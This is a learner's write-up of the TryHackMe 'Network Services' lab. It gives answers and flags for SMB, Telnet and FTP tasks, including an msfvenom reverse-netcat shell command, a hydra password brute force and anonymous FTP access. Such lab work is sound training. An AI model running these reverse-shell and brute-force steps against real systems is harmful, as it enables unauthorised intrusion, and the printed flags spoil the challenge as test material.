TryHackMe: Network Services 1 writeup
I only started documenting from task 6, so the first 5 tasks are just solutions
Task 1: Get Connected
- No answers needed
Task 2: Understanding SMB
Question 1
- Server message block
Question 2
- response-request
Question 3
- TCP/IP
Question 4
- Unix
Task 3: Enumerating SMB
Question 1*
- 3
Question 2
-139/445
Question 3
- Workgroup
Question 4
- POLOSMB
Question 5
- 6.1
Question 6
- profiles
Task 4: Exploiting SMB
Question 1
- smbclient //10.10.10.2/secret -U suit -p 445
Question 2
- No answer needed
Question 3
- Y
Question 4
- John Cactus
Question 5
- ssh
Question 6
- .ssh
Question 7
- id_rsa
Question 8
- THM{smb_is_fun_eh?}
Task 5: Understanding Telnet
Question 1
- application protocol
Question 2
- ssh
Question 3
- telnet 10.10.10.3 23
Question 4
- encryption
Task 6: Enumerating Telnet
Question 1
- Run Nmap on every port with "NMAP {MACHINE_IP} -p-" .
- Took a long time
- 1 port open
Question 2
- port 8012
Question 3*
- protocol is {tcp}
Question 4
- All ports shown as closed
Question 5
- No answer needed
Question 6
- Run Nmap on that specific port
- If you read the fingerprint string it shows some text: skid's backdoor
- Answer is " a backdoor"
Question 7
- Likely belong's to user "Skidy"
Task 7: Exploiting Telnet
I forgot to update the blog before closing so no terminal screenshots available just instructions
Question 1
- run "telnet {TARGET_MACHINE_IP} {PORT}"
- No answer needed
Question 2
Question 3
Question 4
- No answer needed
Question 5
- No answer needed
Question 6
Question 7
- No answer needed
Question 8
- Run "msfvenom -p cmd/unix/reverse_netcat lhost={local_machine_ip} lport=4444 R" in a new terminal
Question 9
- Run the command in the question in a new terminal and create a new listener
Question 10
- No answer needed
Question 11
Task 8: Understanding FTP
Question 1
Question 2
- Research the question
- 21
Question 3
- 2:
- Active conn: Client opens port and listens, server has to actively make connection to it
- Passive conn: Server opens a port and listens passively, client connects to this port
Task 9: Enumerating FTP
Question 1
- Run nmap on all ports on target machine
- Output:
- Answer: 2 ports open
- 21 FTP, 80 http
Question 2
- Read nmap report: 21
Question 3
- Read nmap report: vsftpd
Question 4
- Connect to FTP server of target machine
- log in as name: "anonymous", password: ""
- list files with ls command
- Answer is "PUBLIC_NOTICE.txt"
Question 5
- Download the file to local machine using get {file_name} command
Open new terminal and read the public_notice.txt file
Letter written by potential user "Mike"
Question 6
- No answer needed
Task 10: Exploiting FTP
Question 1
- Run hydra brute force password cracker on user "mike" with 4 threads on FTP protocol
- Use the verbose flag to show login/pass combination for attempts
- Password is "password"
Question 2
- No answer needed
Question 3
- Connect to FTP server of target machine again
- Login with credentials:
- username: "mike"
- password: "password"
- download file "ftp.txt" to local machine
- Open the file in new terminal
- Flag: "THM{y0u_g0t_th3_ftp_fl4g}"
